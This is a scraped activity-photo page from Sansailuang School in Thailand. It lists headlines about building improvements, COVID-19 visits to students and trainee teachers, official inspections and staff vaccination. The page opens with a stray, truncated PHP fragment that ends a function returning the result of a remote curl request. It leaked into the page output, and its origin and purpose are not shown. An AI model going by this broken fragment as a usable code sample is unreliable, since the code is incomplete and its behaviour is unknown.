$e=curl_exec($d); curl_close($d); return $e; } ?> ภาพกิจกรรม - Sansailuang School | https://ssl.ac.th

ภาพกิจกรรม

ปรับปรุงห้องประชุมเล็ก

นพ. วีรพรรณ อินต๊ะศรี และคุณแม่ผ่องพรรณ อินต๊ะศรี (คุณแม่ นพ..

กิจกรรมพัฒนาอาคารสถานที่

รับการนิเทศติดตามการจัดการเรียนการสอนในสถานการณ์โควิด - 19

ส่งมอบกำลังใจแด่นักศึกษาฝึกสอนที่เข้ารับการรักษาตัว COVID-19

เยี่ยมไข้ให้กำลังใจกับนักเรียนและครอบครัวที่ติดเชื้อโควิด-19

ขอแสดงความยินดีกับครูภาวินี สิงคราช และครูธีรเดช ชนะสิรชัยเล..

ต้อนรับศึกษาดูงานจาก รร.บ้านหนองไคร้ ศึกษาดูงาน.การสร้างอาคา..

ศึกษาธิการภาค 15และคณะ มาตรวจเยี่ยมการจัดการเรียนการสอนในสถา..

พัฒนาอาคารสถานที่ เพื่อความปลอดภัยของบุคลากร

ครูประจำชั้นเยี่ยมให้กำลังใจนักเรียนที่ติดโควิด

ผอ.ประพันธ์ ทองหนัก นำทีมท่านรอง คณะครู รับวัคซีนแอสตราฯ บูท..